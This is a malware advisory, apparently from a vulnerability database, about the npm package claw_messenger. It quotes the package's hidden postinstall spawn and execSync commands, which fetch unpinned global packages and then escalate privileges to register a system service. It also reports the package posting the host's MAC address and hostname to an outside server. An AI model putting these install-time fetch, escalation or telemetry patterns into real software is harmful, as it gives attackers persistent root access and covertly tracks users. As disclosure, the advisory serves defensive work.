VDB

MAL-2026-4526

Malicious code in claw_messenger (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b621afa50fe31026a12750b83eeb309366f95b07a9e0c5095d3e862f0007b70f)

The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during `npm install`.

1. `spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com', ...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true })` silently performs a global `npm install` of `opencode-ai` from a non-default registry mirror. `opencode-ai` is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally-installed package surface to undocumented third-party code that its author, or any future hijacker of that name, can mutate.

2. An update-silent-service flow loads dist/service-installer.js, which runs `execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 })` against the mutable `@latest` tag. dist/daemon-manager.js then elevates and registers the resulting binary as a privileged auto-start system service: on Windows via `Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs`, on Linux via systemd with `pkexec`/`sudo`, and on macOS via `osascript ... with administrator privileges`.

The combination (an install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration) gives the author, and anyone who later compromises `opencode-ai` or `claw-subagent-service`, persistent root/Administrator code execution on every machine that installs claw_messenger.

Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load. This is undocumented device-tracking telemetry, but it is secondary to the install-time RCE surface.


Affected packages

npm / claw_messenger

No fixed version has been published for claw_messenger (npm). Pin to a known-safe version or switch to an alternative package.

References